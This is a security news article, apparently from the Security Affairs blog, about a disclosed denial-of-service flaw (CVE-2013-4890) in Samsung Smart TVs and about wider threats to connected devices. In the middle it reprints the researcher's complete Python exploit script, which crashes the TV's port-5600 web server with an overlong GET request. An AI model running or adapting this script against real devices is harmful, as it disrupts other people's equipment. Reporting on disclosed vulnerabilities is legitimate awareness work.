Researcher demonstrated SmartTV hacking on Samsung models

The researcher Malik Mesellem demonstrated that SmartTV hacking is a real menace, Samsung models could be forced to reboot sending an HTTP GET request

It is known that smartTV hacking is a reality, these devices are connected to the Internet and suffers cyber threats exactly as any other device. Principal security firms predict a bleak future for a large number of devices that we daily use,  in a previous post on the “intelligent components” that surround us I anticipated means and methods of the cyber offensives.  The massive introduction of technology in our life has dramatically increased our surface of attack, we are all potential targets and the majority of users has no awareness of the cyber threats.

It must be considered that these objects in many cases manage also a huge quantity of the user’s data and personal information, in other cases they provide direct access to the user’s environment such as the domestic LAN, or worst the possibility to spy on victims with a camera or a microphone that equip the devices.

SmartTVs are considerable privilege targets for the above reason an attacker could be interested to hack our domestic appliance with following purposes:

  • Cyberespionage – Object such as SmartTV are open gates to our domestic network where are available a huge quantity of personal data.
  • To recruit new bot to compose powerful botnets to conduct cyber attacks against strategic targets. Let’s think of the possibility to use any device to conduct a DDoS attack or a phishing attack (soon on these screens … )
  • Cybercrime – hackers could be interested in the user’s data related to payments (e.g. Banking credentials) … and this data could be available on gaming console or in clear text on the hard drive of a media center connected to the TV. The principal monetization schema could include the use of ransomware or the spread of malicious agent for Bitcoin mining.
In this day is circulating the news on a vulnerability present in the latest firmware of the Samsung TV models that allows SmartTV hacking, a hacker could hit the device with a Denial of Service (DoS) Attack, according to security researcher Malik Mesellem.
The researcher revealed that the web server (DMCRUIS/0.1) installed on Smart TVs that responds on TCP port  5600 can be used to force a reboot of the device just sending a specifically formatted HTTP GET request on TV’s ip address.
#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   As a results, the TV reboots...
#   Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)

import httplib
import sys
import os

print "  ***************************************************************************************"
print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description:\n"
print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "     Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "  ***************************************************************************************\n"

# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"
Malik Mesellem provided a proof of concept for the SmartTV hacking in a video in which it exploits his Samsung plasms TV PS50C7700.
“I discovered a DoS vulnerability on some Samsung TV devices.The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request, and as a results, the TV reboots… Tested successfully on my Samsung PS50C7700 plasma TV.”

In the video it is possible to observe that just after receiving the request the TV would restart and repeat the process, this means that an attacker accessing to LAN where TV is installed is able to hack it, this is possible for example designing
a malware that sends requests on compromised LAN.

 

Who and how will manage the updates of these devices?
This will be yet another opportunity provided to the attackers for the SmartTV hacking.

Pierluigi Paganini

(Security Affairs – SmartTV hacking)

Pierluigi Paganini: Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

This website uses cookies.